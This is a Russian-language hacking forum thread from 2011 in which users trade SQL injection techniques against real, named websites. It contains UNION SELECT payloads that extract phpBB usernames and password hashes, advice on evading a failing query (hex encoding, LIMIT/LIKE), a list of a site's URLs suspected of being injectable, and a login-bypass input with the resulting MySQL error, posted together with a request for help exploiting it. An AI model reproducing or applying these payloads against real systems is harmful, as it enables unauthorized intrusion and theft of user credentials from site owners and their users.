 |
|
25.04.2011, 18:09
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Да что вы. Здесь нет SQL. Параметр обрабатывается функцией intval. Т е первые цифры сохраняються, а всё что идёт после них обрезаеться.
Пример:
Код:
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2'''')))) Пиши всё что угодно!
|
|
|
25.04.2011, 18:11
|
|
Участник форума
Регистрация: 31.03.2011
Сообщений: 250
С нами:
7957046
Репутация:
81
|
|
phpbb 3.0.0 MySQL 4.0.27 blind inj
Код:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-
Результат показывает.
Код:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-
Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти? |
|
|
|
25.04.2011, 18:27
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от guezd
phpbb 3.0.0 MySQL 4.0.27 blind inj
Код:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-
Результат показывает.
Код:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-
Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти? 1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе.
2. Конвентируй в HEX, а не в CHAR.
3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE.
P.S. Не получиться, ссылку в ПМ.
|
|
|
|
25.04.2011, 20:15
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от guezd
phpbb 3.0.0 MySQL 4.0.27 blind inj
blind с выводом через union? как это?
|
|
|
|
25.04.2011, 20:37
|
|
Участник форума
Регистрация: 31.03.2011
Сообщений: 250
С нами:
7957046
Репутация:
81
|
|
Сообщение от M_script
blind с выводом через union? как это?
это ошибка новичка =)
|
|
|
|
25.04.2011, 22:28
|
|
Новичок
Регистрация: 16.04.2011
Сообщений: 3
С нами:
7934006
Репутация:
0
|
|
Сообщение от vasykas
Здесь есть blind
http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogs ection&id=3
http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1
Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?
|
|
|
|
26.04.2011, 13:36
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Сообщение от Crouch
Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?
Нет моя прога ошиблась (см. топик выше от XAMEHA)
|
|
|
|
26.04.2011, 13:37
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
сам нашел
|
|
|
|
26.04.2011, 13:57
|
|
Новичок
Регистрация: 16.04.2011
Сообщений: 3
С нами:
7934006
Репутация:
0
|
|
Сообщение от vasykas
Нет моя прога ошиблась (см. топик выше от
XAMEHA
)
Значит все дело в обработке intval?
|
|
|
|
26.04.2011, 18:30
|
|
Новичок
Регистрация: 13.02.2011
Сообщений: 7
С нами:
8023286
Репутация:
0
|
|
В поле авторизации пишу hi' or 1=1-- на сайте http://*******.tv/login.php И выводит You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' at line 4. Тоесть скуля Как такую крутить?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
